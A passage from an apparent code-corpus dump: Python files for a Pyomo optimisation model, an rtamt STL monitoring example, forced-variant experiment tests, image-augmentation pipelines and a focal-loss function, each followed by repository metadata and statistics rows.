    + 7.30205954460765e-5*m.x11) == 0)
m.c54 = Constraint(expr=4.04097807027501e-6*m.x11 - m.x65*(
    5.04667648751466e-7*m.x10 + 4.04097807027501e-6*m.x11) == 0)
# c55: degenerate one-term group — algebraically forces x66 == 1 whenever
# x11 is nonzero.
m.c55 = Constraint(expr=1.0056984172397e-7*m.x11 - 1.0056984172397e-7*m.x66*m.x11 == 0)
# c56..c65: per-stage linear balances linking the ratio variables to the
# slack/surplus pair (x67..x76, x77..x86) — exactly the variables summed
# and minimized in m.obj above.
m.c56 = Constraint(expr= 0.200000000000001*m.x2 - 436*m.x12 - m.x67 + m.x77 == 0)
m.c57 = Constraint(expr= 0.36001600160016*m.x3 - 436*m.x13 - 288*m.x14 - m.x68 + m.x78 == 0)
m.c58 = Constraint(expr= 0.488038405760964*m.x4 - 436*m.x15 - 288*m.x16 - 185*m.x17 - m.x69 + m.x79 == 0)
m.c59 = Constraint(expr= 0.590461451522498*m.x5 - 436*m.x18 - 288*m.x19 - 185*m.x20 - 75*m.x21 - m.x70 + m.x80 == 0)
m.c60 = Constraint(expr= 0.672401937412355*m.x6 - 436*m.x22 - 288*m.x23 - 185*m.x24 - 75*m.x25 - 19*m.x26 - m.x71
    + m.x81 == 0)
m.c61 = Constraint(expr= 0.737954326124241*m.x7 - 436*m.x27 - 288*m.x28 - 185*m.x29 - 75*m.x30 - 19*m.x31 - 4*m.x32
    - m.x72 + m.x82 == 0)
m.c62 = Constraint(expr= 0.790394925258872*m.x8 - 436*m.x33 - 288*m.x34 - 185*m.x35 - 75*m.x36 - 19*m.x37 - 4*m.x38
    - 2*m.x39 - m.x73 + m.x83 == 0)
m.c63 = Constraint(expr= 0.832345305473249*m.x9 - 436*m.x40 - 288*m.x41 - 185*m.x42 - 75*m.x43 - 19*m.x44 - 4*m.x45
    - 2*m.x46 - m.x74 + m.x84 == 0)
m.c64 = Constraint(expr= 0.865903090606706*m.x10 - 436*m.x48 - 288*m.x49 - 185*m.x50 - 75*m.x51 - 19*m.x52 - 4*m.x53
    - 2*m.x54 - m.x75 + m.x85 == 0)
m.c65 = Constraint(expr= 0.892746631672324*m.x11 - 436*m.x57 - 288*m.x58 - 185*m.x59 - 75*m.x60 - 19*m.x61 - 4*m.x62
    - 2*m.x63 - m.x76 + m.x86 == 0)
# c66 fixes a 1..10-weighted total of x2..x11; c67..c76 impose decreasing
# cumulative lower bounds over shrinking suffixes of x2..x11; c77 defines
# x1 as the plain (unweighted) sum of x2..x11.
m.c66 = Constraint(expr= m.x2 + 2*m.x3 + 3*m.x4 + 4*m.x5 + 5*m.x6 + 6*m.x7 + 7*m.x8 + 8*m.x9 + 9*m.x10 + 10*m.x11
    == 10000)
m.c67 = Constraint(expr= m.x2 + m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 436)
m.c68 = Constraint(expr= m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 288)
m.c69 = Constraint(expr= m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 185)
m.c70 = Constraint(expr= m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 75)
m.c71 = Constraint(expr= m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 19)
m.c72 = Constraint(expr= m.x7 + m.x8 + m.x9 + m.x10 + m.x11 >= 4)
m.c73 = Constraint(expr= m.x8 + m.x9 + m.x10 + m.x11 >= 2)
m.c74 = Constraint(expr= m.x9 + m.x10 + m.x11 >= 0)
m.c75 = Constraint(expr= m.x10 + m.x11 >= 0)
m.c76 = Constraint(expr= m.x11 >= 0)
m.c77 = Constraint(expr= - m.x1 + m.x2 + m.x3 + m.x4 + m.x5 + m.x6 + m.x7 + m.x8 + m.x9 + m.x10 + m.x11 == 0)
| 64.591281
| 120
| 0.627167
| 3,729
| 23,705
| 3.98686
| 0.084473
| 0.011973
| 0.080985
| 0.115692
| 0.74514
| 0.73236
| 0.731217
| 0.729804
| 0.728863
| 0.653528
| 0
| 0.489466
| 0.203037
| 23,705
| 366
| 121
| 64.76776
| 0.29748
| 0.028602
| 0
| 0.338346
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003759
| 0
| 0.003759
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ec5eb414078945655ab0fa8739f75c1900af0e5
| 10,665
|
py
|
Python
|
examples/offline_monitors/offline_monitor_discrete_time.py
|
xiaoyaooo/rtamt
|
edb7bf664720c52e9d70920102c450b1f593af95
|
[
"BSD-3-Clause"
] | 24
|
2019-12-04T00:20:16.000Z
|
2022-03-24T17:48:14.000Z
|
examples/offline_monitors/offline_monitor_discrete_time.py
|
xiaoyaooo/rtamt
|
edb7bf664720c52e9d70920102c450b1f593af95
|
[
"BSD-3-Clause"
] | 142
|
2020-01-16T15:36:21.000Z
|
2022-03-28T20:40:45.000Z
|
examples/offline_monitors/offline_monitor_discrete_time.py
|
xiaoyaooo/rtamt
|
edb7bf664720c52e9d70920102c450b1f593af95
|
[
"BSD-3-Clause"
] | 17
|
2020-07-07T20:32:08.000Z
|
2022-03-07T07:20:22.000Z
|
#!/usr/bin/env python
import sys
import csv
import rtamt
import os
from rtamt.spec.stl.discrete_time.specification import Semantics
def monitor():
    """Evaluate the request/grant STL specification over the example traces.

    For each example trace (a)-(d) the same discrete-time specification
    ``out = ((req >= 3) implies eventually[0:5] (gnt >= 3))`` is monitored
    offline under three semantics — standard robustness, output robustness
    and input vacuity — and the robustness value of the final sample of
    each run is printed.

    Bug fixed vs. the original: the "(d) - input vacuity" run iterated over
    ``data1`` instead of ``data4`` (copy-paste slip in the twelfth of the
    twelve near-identical blocks); it now uses ``data4`` like the other
    Example (d) runs.
    """
    # Load traces
    data1 = read_csv('example1.csv')
    data2 = read_csv('example2.csv')
    data3 = read_csv('example3.csv')
    data4 = read_csv('example4.csv')

    traces = [('a', data1), ('b', data2), ('c', data3), ('d', data4)]
    modes = [
        ('standard robustness', Semantics.STANDARD),
        ('output robustness', Semantics.OUTPUT_ROBUSTNESS),
        ('input vacuity', Semantics.INPUT_VACUITY),
    ]
    for label, data in traces:
        for mode_name, semantics in modes:
            rob = _monitor_trace(data, semantics)
            print('Example ({}) - {}: {}'.format(label, mode_name, rob))


def _monitor_trace(data, semantics):
    """Build one specification under ``semantics``, run it over ``data``,
    and return the robustness of the last processed sample.

    ``data`` is the dict produced by :func:`read_csv`; note the column
    headers carry a leading space (' req', ' gnt') exactly as in the
    example CSV files.
    """
    spec = rtamt.STLDiscreteTimeSpecification(1)
    spec.name = 'Example 1'
    spec.declare_var('req', 'float')
    spec.declare_var('gnt', 'float')
    spec.declare_var('out', 'float')
    spec.set_var_io_type('req', 'input')
    spec.set_var_io_type('gnt', 'output')
    # The original file mixed two spellings of the same formula (with and
    # without spaces); they parse to the same specification, so the spaced
    # form is used throughout.
    spec.spec = 'out = ((req >= 3) implies eventually[0:5] (gnt >= 3))'
    spec.semantics = semantics
    try:
        spec.parse()
        spec.pastify()  # called before update() in all original examples
    except rtamt.STLParseException as err:
        print('STL Parse Exception: {}'.format(err))
        sys.exit()
    rob = None
    # Feed the trace sample by sample; each fed value is the value half of
    # the (time, value) pairs stored by read_csv.
    for i in range(len(data[' gnt'])):
        rob = spec.update(i, [('req', data[' req'][i][1]),
                              ('gnt', data[' gnt'][i][1])])
    return rob
def read_csv(filename):
    """Read a CSV trace into a dict of per-column time series.

    The first row is treated as the header and its names are used verbatim
    as keys (the example files have headers such as ' req' with a leading
    space).  Every remaining row contributes, for each column, a
    ``(time, value)`` pair of floats where the time is taken from the row's
    first column.

    Fixed vs. the original: the file handle is now closed deterministically
    via a ``with`` block (it was previously never closed), and an empty
    file yields ``{}`` instead of raising ``TypeError`` while iterating a
    ``None`` header row.
    """
    columns = {}
    with open(filename, 'r') as f:
        reader = csv.reader(f)
        headers = next(reader, None)
        if headers is None:
            # Empty file: no header row, therefore no columns.
            return columns
        for h in headers:
            columns[h] = []
        for row in reader:
            for h, v in zip(headers, row):
                columns[h].append((float(row[0]), float(v)))
    return columns
if __name__ == '__main__':
    # Run from the directory containing this script so that the example
    # CSV files referenced by monitor() resolve via relative paths.
    os.chdir(os.path.dirname(os.path.abspath(__file__)))
    monitor()
| 29.957865
| 90
| 0.572808
| 1,340
| 10,665
| 4.458955
| 0.073881
| 0.066276
| 0.084351
| 0.076318
| 0.913808
| 0.854226
| 0.854059
| 0.854059
| 0.854059
| 0.851715
| 0
| 0.017072
| 0.236568
| 10,665
| 355
| 91
| 30.042254
| 0.716777
| 0.045945
| 0
| 0.842975
| 0
| 0
| 0.218075
| 0.005176
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008264
| false
| 0
| 0.020661
| 0
| 0.033058
| 0.099174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7edead2c9a55c204e33cab0245db505c43d862ea
| 5,566
|
py
|
Python
|
tests/providers/forced_variant_tests.py
|
isugimpy/experiments.py
|
ddfcd6fd010c8806a88cd3c51f55332d857622c5
|
[
"BSD-3-Clause"
] | 5
|
2021-04-04T05:24:47.000Z
|
2021-08-12T21:42:23.000Z
|
tests/providers/forced_variant_tests.py
|
Seanpm2001-reddit/experiments.py
|
c5f8373d051845ab550a9ae65041afcc4c9f996b
|
[
"BSD-3-Clause"
] | 1
|
2021-04-06T02:06:50.000Z
|
2021-05-17T15:34:59.000Z
|
tests/providers/forced_variant_tests.py
|
Seanpm2001-reddit/experiments.py
|
c5f8373d051845ab550a9ae65041afcc4c9f996b
|
[
"BSD-3-Clause"
] | 4
|
2021-04-08T10:02:42.000Z
|
2022-01-12T22:16:46.000Z
|
import time
import unittest
from datetime import datetime
from datetime import timedelta
from reddit_experiments.providers import ISO_DATE_FMT
from reddit_experiments.providers import parse_experiment
from reddit_experiments.providers.forced_variant import ForcedVariantExperiment
# Thirty days expressed in seconds (float); used to offset start/stop timestamps.
THIRTY_DAYS = timedelta(days=30).total_seconds()
class TestForcedVariantExperiment(unittest.TestCase):
    """Tests the conditions under which parse_experiment yields a
    ForcedVariantExperiment (unknown type, global override, disabled,
    outside the start/stop window, expired) and the behaviour of
    ForcedVariantExperiment itself."""

    def _make_cfg(self, remove=(), **overrides):
        """Return a baseline 'r2' experiment config.

        Keyword overrides replace (or add) top-level keys; any key named
        in ``remove`` is deleted afterwards.  Extracted because the
        original spelled out eight near-identical literal dicts.
        """
        cfg = {
            "id": 1,
            "name": "test",
            "owner": "test",
            "type": "r2",
            "version": "1",
            "start_ts": time.time() - THIRTY_DAYS,
            "stop_ts": time.time() + THIRTY_DAYS,
            "experiment": {"id": 1, "name": "test", "variants": {"control_1": 10, "control_2": 10}},
        }
        cfg.update(overrides)
        for key in remove:
            cfg.pop(key, None)
        return cfg

    def test_unknown_type_returns_null_experiment(self):
        experiment = parse_experiment(self._make_cfg(type="unknown"))
        self.assertIsInstance(experiment, ForcedVariantExperiment)
        self.assertIsNone(experiment.variant())
        self.assertFalse(experiment.should_log_bucketing())

    def test_global_override_returns_forced_variant(self):
        experiment = parse_experiment(self._make_cfg(global_override="foo"))
        self.assertIsInstance(experiment, ForcedVariantExperiment)

    def test_disable_returns_forced_variant(self):
        experiment = parse_experiment(self._make_cfg(enabled=False))
        self.assertIsInstance(experiment, ForcedVariantExperiment)

    def test_before_start_ts_returns_forced_variant(self):
        cfg = self._make_cfg(start_ts=time.time() + THIRTY_DAYS,
                             stop_ts=time.time() + THIRTY_DAYS * 2,
                             enabled=True)
        experiment = parse_experiment(cfg)
        self.assertIsInstance(experiment, ForcedVariantExperiment)

    def test_after_stop_ts_returns_forced_variant(self):
        cfg = self._make_cfg(start_ts=time.time() - THIRTY_DAYS * 2,
                             stop_ts=time.time() - THIRTY_DAYS,
                             enabled=True)
        experiment = parse_experiment(cfg)
        self.assertIsInstance(experiment, ForcedVariantExperiment)

    def test_after_expires_returns_forced_variant(self):
        expires = (datetime.now() - timedelta(days=30)).strftime(ISO_DATE_FMT)
        cfg = self._make_cfg(remove=("start_ts", "stop_ts"),
                             expires=expires, enabled=True)
        experiment = parse_experiment(cfg)
        self.assertIsInstance(experiment, ForcedVariantExperiment)

    def test_expires_ignores_start_ts(self):
        expires = (datetime.now() + timedelta(days=30)).strftime(ISO_DATE_FMT)
        cfg = self._make_cfg(remove=("stop_ts",),
                             start_ts=time.time() + THIRTY_DAYS,
                             expires=expires, enabled=True)
        experiment = parse_experiment(cfg)
        self.assertNotIsInstance(experiment, ForcedVariantExperiment)

    def test_start_ts_and_stop_ts_ignore_expires(self):
        # expires is in the past, but valid start/stop timestamps win.
        expires = (datetime.now() - timedelta(days=30)).strftime(ISO_DATE_FMT)
        cfg = self._make_cfg(expires=expires, enabled=True)
        experiment = parse_experiment(cfg)
        self.assertNotIsInstance(experiment, ForcedVariantExperiment)

    def test_forced_variant(self):
        experiment = ForcedVariantExperiment("foo")
        self.assertIs(experiment.variant(), "foo")
        self.assertFalse(experiment.should_log_bucketing())

    def test_forced_variant_null(self):
        experiment = ForcedVariantExperiment(None)
        self.assertIsNone(experiment.variant())
        self.assertFalse(experiment.should_log_bucketing())
| 37.608108
| 100
| 0.557672
| 549
| 5,566
| 5.437158
| 0.125683
| 0.01608
| 0.037521
| 0.058961
| 0.80469
| 0.78057
| 0.7799
| 0.769514
| 0.750419
| 0.740034
| 0
| 0.022652
| 0.294107
| 5,566
| 147
| 101
| 37.863946
| 0.737083
| 0
| 0
| 0.721805
| 0
| 0
| 0.147682
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 1
| 0.075188
| false
| 0
| 0.052632
| 0
| 0.135338
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7ef351c5391cd71679a57af43c1e53990f224ff0
| 18,709
|
py
|
Python
|
data_augmentation.py
|
aod321/new_train
|
23bf0a64ac274433cbc372898d97ae9d1aa5f6cd
|
[
"BSD-2-Clause"
] | 16
|
2020-07-11T07:53:49.000Z
|
2022-03-10T11:52:31.000Z
|
data_augmentation.py
|
aod321/new_train
|
23bf0a64ac274433cbc372898d97ae9d1aa5f6cd
|
[
"BSD-2-Clause"
] | 1
|
2020-08-12T07:57:47.000Z
|
2021-08-31T15:08:23.000Z
|
data_augmentation.py
|
aod321/new_train
|
23bf0a64ac274433cbc372898d97ae9d1aa5f6cd
|
[
"BSD-2-Clause"
] | 1
|
2022-02-28T10:32:43.000Z
|
2022-02-28T10:32:43.000Z
|
from torch.utils.data import ConcatDataset
from torchvision import transforms
from preprocess import Resize, GaussianNoise, RandomAffine, \
ToPILImage, ToTensor, Stage2_ToTensor, Stage2_RandomAffine, Stage2_GaussianNoise, Stage2ToPILImage, OrigPad, \
Stage2_nose_mouth_RandomAffine, Skin_ToTensor, Stage1ToTensor
class Stage1Augmentation(object):
    """Builds augmented copies of a stage-1 dataset.

    Five pipelines are created ('origin' plus four random-augmentation
    choices); get_dataset() concatenates one dataset per pipeline for
    training and uses the untouched 'origin' pipeline for validation.
    """

    def __init__(self, dataset, txt_file, root_dir, parts_root_dir, resize):
        self.augmentation_name = ['origin', 'choice1', 'choice2', 'choice3', 'choice4']
        self.randomchoice = None
        self.transforms = None
        self.transforms_list = None
        self.dataset = dataset
        self.txt_file = txt_file
        self.root_dir = root_dir
        self.parts_root_dir = parts_root_dir
        self.resize = resize
        self.set_choice()
        self.set_transformers()
        self.set_transforms_list()

    def set_choice(self):
        """Populate self.randomchoice with the candidate augmentations per
        choice.  R = rotate, S = scale, T = translate; choice1 also mixes
        in Gaussian noise."""
        degree = 15
        translate_range = (0.1, 0.1)
        scale_range = (0.9, 1.2)
        self.randomchoice = {
            # choice 1: noise, affine, or noise followed by affine
            self.augmentation_name[1]: [
                GaussianNoise(),
                RandomAffine(degrees=degree, translate=translate_range, scale=scale_range),
                transforms.Compose([
                    GaussianNoise(),
                    RandomAffine(degrees=degree, translate=translate_range, scale=scale_range),
                ]),
            ],
            # choice 2: a single effect — R, S or T
            self.augmentation_name[2]: [
                RandomAffine(degrees=degree, translate=None, scale=None),
                RandomAffine(degrees=0, translate=None, scale=(0.8, 1.5)),
                RandomAffine(degrees=0, translate=(0.3, 0.3), scale=None),
            ],
            # choice 3: pairs — RT, RS, ST
            self.augmentation_name[3]: [
                RandomAffine(degrees=degree, translate=translate_range, scale=None),
                RandomAffine(degrees=degree, translate=None, scale=scale_range),
                RandomAffine(degrees=0, translate=translate_range, scale=scale_range),
            ],
            # choice 4: all three — RST
            self.augmentation_name[4]: [
                RandomAffine(degrees=degree, translate=translate_range, scale=scale_range),
            ],
        }

    def set_resize(self, resize):
        self.resize = resize

    def set_transformers(self):
        """Build one Compose pipeline per augmentation name.

        Deduplicated: the original spelled out five near-identical
        pipelines differing only in the RandomChoice step.
        """
        def pipeline(choice_name):
            steps = [ToPILImage()]
            if choice_name is not None:
                # Pick one augmentation from the candidate list at random.
                steps.append(transforms.RandomChoice(self.randomchoice[choice_name]))
            steps.extend([Resize(self.resize), Stage1ToTensor()])
            return transforms.Compose(steps)

        self.transforms = {
            name: pipeline(None if name == 'origin' else name)
            for name in self.augmentation_name
        }

    def set_transforms_list(self):
        # Training uses every pipeline; validation only the plain 'origin'.
        self.transforms_list = {
            'train': self.transforms,
            'val': self.transforms['origin'],
        }

    def get_dataset(self):
        """Return {'train': ConcatDataset of one dataset per pipeline,
        'val': a single dataset with the 'origin' pipeline}."""
        train_sets = [
            self.dataset(txt_file=self.txt_file['train'],
                         root_dir=self.root_dir,
                         parts_root_dir=self.parts_root_dir,
                         transform=self.transforms_list['train'][name],
                         stage='stage1')
            for name in self.augmentation_name
        ]
        val_set = self.dataset(txt_file=self.txt_file['val'],
                               root_dir=self.root_dir,
                               parts_root_dir=self.parts_root_dir,
                               transform=self.transforms_list['val'],
                               stage='stage1')
        # ('enhaced_datasets' typo from the original fixed; local name only)
        return {'train': ConcatDataset(train_sets), 'val': val_set}
class Stage2Augmentation(object):
    """Builds augmented copies of a stage-2 dataset (separate eye and
    nose/mouth crops).  Five pipelines are created ('origin' plus four
    random-augmentation choices); get_dataset() concatenates one dataset
    per pipeline for training and uses 'origin' for validation."""

    def __init__(self, dataset, txt_file, root_dir, resize=None):
        self.augmentation_name = ['origin', 'choice1', 'choice2', 'choice3', 'choice4']
        self.randomchoice = None
        self.transforms = None
        self.transforms_list = None
        self.dataset = dataset
        self.txt_file = txt_file
        self.root_dir = root_dir
        self.resize = resize  # unused by the stage-2 pipelines; kept for API parity
        self.set_choice()
        self.set_transformers()
        self.set_transforms_list()

    def set_choice(self):
        """Populate self.randomchoice.

        R = rotate, S = scale, T = translate, N = Gaussian noise.  The
        eyes and the nose/mouth regions get independently parameterised
        affines, applied in random order.
        """
        degree_small = (-15, 15)
        degree_large = (-15, 15)
        None_degree = 0
        translate_small = (0.1, 0.1)
        translate_normal = (0.3, 0.3)
        scale_small = (0.8, 1)
        scale_mouth_translate = (0.8, 1)
        scale_large = (1, 1.5)
        scale_with_translate = (1, 1)

        def rand_affine(degree_eyes, degree_mouth, translate_eyes, translate_mouth,
                        scale_eyes, scale_mouth, noise=False):
            # Eyes affine and nose/mouth affine in random order, optionally
            # preceded by Gaussian noise.  (The original duplicated the
            # RandomOrder construction in both branches.)
            affines = transforms.RandomOrder([
                Stage2_RandomAffine(degrees=degree_eyes, translate=translate_eyes,
                                    scale=scale_eyes),
                Stage2_nose_mouth_RandomAffine(degrees=degree_mouth, translate=translate_mouth,
                                               scale=scale_mouth),
            ])
            if not noise:
                return affines
            return transforms.Compose([Stage2_GaussianNoise(), affines])

        self.randomchoice = {
            # choice 1: a single effect — R, S, T or N
            self.augmentation_name[1]: [
                rand_affine(degree_eyes=degree_large, degree_mouth=degree_large, translate_eyes=None,
                            translate_mouth=None, scale_eyes=None, scale_mouth=None),
                rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=None,
                            translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small),
                rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
                            translate_mouth=translate_small, scale_eyes=None, scale_mouth=None),
                Stage2_GaussianNoise(),
            ],
            # choice 2: pairs — RS, RT, RN, ST, SN, TN
            self.augmentation_name[2]: [
                rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=None,
                            translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small),
                rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
                            translate_mouth=translate_small, scale_eyes=None, scale_mouth=None),
                rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=None,
                            translate_mouth=None, scale_eyes=None, scale_mouth=None,
                            noise=True),
                rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
                            translate_mouth=translate_normal,
                            scale_eyes=scale_with_translate, scale_mouth=scale_mouth_translate),
                rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=None,
                            translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small,
                            noise=True),
                rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
                            translate_mouth=translate_small, scale_eyes=None, scale_mouth=None,
                            noise=True),
            ],
            # choice 3: triples — RST, RSN, RTN, STN (in random order)
            self.augmentation_name[3]: [
                transforms.RandomOrder([
                    rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
                                translate_mouth=translate_normal, scale_eyes=scale_with_translate,
                                scale_mouth=scale_mouth_translate),
                    rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=None,
                                translate_mouth=None, scale_eyes=scale_large, scale_mouth=scale_small,
                                noise=True),
                    rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
                                translate_mouth=translate_small, scale_eyes=None, scale_mouth=None,
                                noise=True),
                    rand_affine(degree_eyes=None_degree, degree_mouth=None_degree, translate_eyes=translate_normal,
                                translate_mouth=translate_normal, scale_eyes=scale_with_translate,
                                scale_mouth=scale_mouth_translate, noise=True),
                ])
            ],
            # choice 4: everything at once — RSTN
            self.augmentation_name[4]: [
                rand_affine(degree_eyes=degree_small, degree_mouth=degree_large, translate_eyes=translate_normal,
                            translate_mouth=translate_normal, scale_eyes=scale_with_translate,
                            scale_mouth=scale_mouth_translate, noise=True)
            ],
        }

    def set_resize(self, resize):
        self.resize = resize

    def set_transformers(self):
        """Build one Compose pipeline per augmentation name (deduplicated
        from five spelled-out near-identical pipelines)."""
        def pipeline(choice_name):
            steps = [Stage2ToPILImage()]
            if choice_name is not None:
                steps.append(transforms.RandomChoice(self.randomchoice[choice_name]))
            steps.append(Stage2_ToTensor())
            return transforms.Compose(steps)

        self.transforms = {
            name: pipeline(None if name == 'origin' else name)
            for name in self.augmentation_name
        }

    def set_transforms_list(self):
        # Training uses every pipeline; validation only the plain 'origin'.
        self.transforms_list = {
            'train': self.transforms,
            'val': self.transforms['origin'],
        }

    def get_dataset(self):
        """Return {'train': ConcatDataset of one dataset per pipeline,
        'val': a single dataset with the 'origin' pipeline}."""
        train_sets = [
            self.dataset(txt_file=self.txt_file['train'],
                         root_dir=self.root_dir,
                         transform=self.transforms_list['train'][name])
            for name in self.augmentation_name
        ]
        val_set = self.dataset(txt_file=self.txt_file['val'],
                               root_dir=self.root_dir,
                               transform=self.transforms_list['val'])
        return {'train': ConcatDataset(train_sets), 'val': val_set}
class SkinHairAugmentation(object):
    """Builds augmented copies of a skin/hair dataset.  Identical scheme to
    Stage1Augmentation but with Skin_ToTensor and no parts_root_dir."""

    def __init__(self, dataset, txt_file, root_dir, resize):
        self.augmentation_name = ['origin', 'choice1', 'choice2', 'choice3', 'choice4']
        self.randomchoice = None
        self.transforms = None
        self.transforms_list = None
        self.dataset = dataset
        self.txt_file = txt_file
        self.root_dir = root_dir
        self.resize = resize
        self.set_choice()
        self.set_transformers()
        self.set_transforms_list()

    def set_choice(self):
        """Populate self.randomchoice (R = rotate, S = scale, T = translate;
        choice1 also mixes in Gaussian noise)."""
        degree = 15
        translate_range = (0.1, 0.1)
        scale_range = (0.9, 1.2)
        self.randomchoice = {
            # choice 1: noise, affine, or noise followed by affine
            self.augmentation_name[1]: [
                GaussianNoise(),
                RandomAffine(degrees=degree, translate=translate_range, scale=scale_range),
                transforms.Compose([
                    GaussianNoise(),
                    RandomAffine(degrees=degree, translate=translate_range, scale=scale_range),
                ]),
            ],
            # choice 2: a single effect — R, S or T
            self.augmentation_name[2]: [
                RandomAffine(degrees=degree, translate=None, scale=None),
                RandomAffine(degrees=0, translate=None, scale=(0.8, 1.5)),
                RandomAffine(degrees=0, translate=(0.3, 0.3), scale=None),
            ],
            # choice 3: pairs — RT, RS, ST
            self.augmentation_name[3]: [
                RandomAffine(degrees=degree, translate=translate_range, scale=None),
                RandomAffine(degrees=degree, translate=None, scale=scale_range),
                RandomAffine(degrees=0, translate=translate_range, scale=scale_range),
            ],
            # choice 4: all three — RST
            self.augmentation_name[4]: [
                RandomAffine(degrees=degree, translate=translate_range, scale=scale_range),
            ],
        }

    def set_resize(self, resize):
        self.resize = resize

    def set_transformers(self):
        """Build one Compose pipeline per augmentation name (deduplicated
        from five spelled-out near-identical pipelines)."""
        def pipeline(choice_name):
            steps = [ToPILImage()]
            if choice_name is not None:
                steps.append(transforms.RandomChoice(self.randomchoice[choice_name]))
            steps.extend([Resize(self.resize), Skin_ToTensor()])
            return transforms.Compose(steps)

        self.transforms = {
            name: pipeline(None if name == 'origin' else name)
            for name in self.augmentation_name
        }

    def set_transforms_list(self):
        # Training uses every pipeline; validation only the plain 'origin'.
        self.transforms_list = {
            'train': self.transforms,
            'val': self.transforms['origin'],
        }

    def get_dataset(self):
        """Return {'train': ConcatDataset of one dataset per pipeline,
        'val': a single dataset with the 'origin' pipeline}."""
        train_sets = [
            self.dataset(txt_file=self.txt_file['train'],
                         root_dir=self.root_dir,
                         transform=self.transforms_list['train'][name])
            for name in self.augmentation_name
        ]
        val_set = self.dataset(txt_file=self.txt_file['val'],
                               root_dir=self.root_dir,
                               transform=self.transforms_list['val'])
        return {'train': ConcatDataset(train_sets), 'val': val_set}
| 44.545238
| 117
| 0.497621
| 1,566
| 18,709
| 5.683908
| 0.072158
| 0.061117
| 0.076396
| 0.033704
| 0.903494
| 0.882597
| 0.880688
| 0.82912
| 0.823054
| 0.812268
| 0
| 0.015062
| 0.418034
| 18,709
| 419
| 118
| 44.651551
| 0.802443
| 0.025389
| 0
| 0.794595
| 0
| 0
| 0.019766
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051351
| false
| 0
| 0.008108
| 0
| 0.078378
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d396c3346bf83984bd4f715f728267283f0bb30
| 4,325
|
py
|
Python
|
mpa/modules/models/losses/class_balanced_losses.py
|
openvinotoolkit/model_preparation_algorithm
|
8d36bf5944837b7a3d22fc2c3a4cb93423619fc2
|
[
"Apache-2.0"
] | null | null | null |
mpa/modules/models/losses/class_balanced_losses.py
|
openvinotoolkit/model_preparation_algorithm
|
8d36bf5944837b7a3d22fc2c3a4cb93423619fc2
|
[
"Apache-2.0"
] | null | null | null |
mpa/modules/models/losses/class_balanced_losses.py
|
openvinotoolkit/model_preparation_algorithm
|
8d36bf5944837b7a3d22fc2c3a4cb93423619fc2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
#
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcls.models.builder import LOSSES
from mmcls.models.losses.utils import weight_reduce_loss
def focal_loss(pred, target, weight=None, gamma=2.0,
               alpha=0.25, reduction='mean', avg_factor=None, ignore_index=None,
               label_smoothing=0.8):
    """Multi-class focal loss via per-class BCE-with-logits.

    Args:
        pred: raw logits, assumed shape (N, C) — softmax/scatter are on dim 1.
        target: integer class indices, shape (N,).
        weight: optional element weights forwarded to weight_reduce_loss.
        gamma: focusing exponent of the modulating factor.
        alpha: positive/negative balancing factor.
        reduction: 'none' | 'mean' | 'sum'.
        avg_factor: optional normalizer used by weight_reduce_loss.
        ignore_index: label value whose samples are dropped before the loss.
        label_smoothing: smoothing factor applied to the one-hot targets
            (1.0 disables smoothing).  Previously hard-coded to 0.8; the
            default preserves the original behaviour.
    """
    if ignore_index is not None:
        # Compute the mask once (the original evaluated it twice).
        keep = target != ignore_index
        pred = pred[keep]
        target = target[keep]
    pred_softmax = F.softmax(pred, 1)
